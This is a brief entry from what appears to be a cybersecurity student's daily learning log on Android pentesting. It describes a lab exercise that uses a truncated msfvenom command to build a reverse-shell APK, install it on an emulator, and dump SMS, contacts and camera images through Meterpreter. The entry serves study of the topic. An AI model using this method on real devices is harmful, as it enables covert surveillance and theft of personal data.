

Day 89

Topic: Android Pentesting

Objective: To perform active exploitation of Android devices using ADB and Metasploit.

Theoretical Concepts:

We focused on the Android Debug Bridge (ADB). While useful for developers, leaving ADB enabled and exposed is a major risk.

Practical Work:

We used Metasploit to generate a malicious APK payload: `msfvenom -p android/meterpreter/reverse_tcp ...`. We installed this APK on the emulator. Once opened, we received a Meterpreter session on Kali. We demonstrated dumping SMS messages, contact lists, and taking a snapshot from the camera using the remote shell.

Tools Used: ADB, MobSF, Metasploit.

Outcome: Understanding the impact of malicious apps and remote access Trojans (RATs) on mobile devices.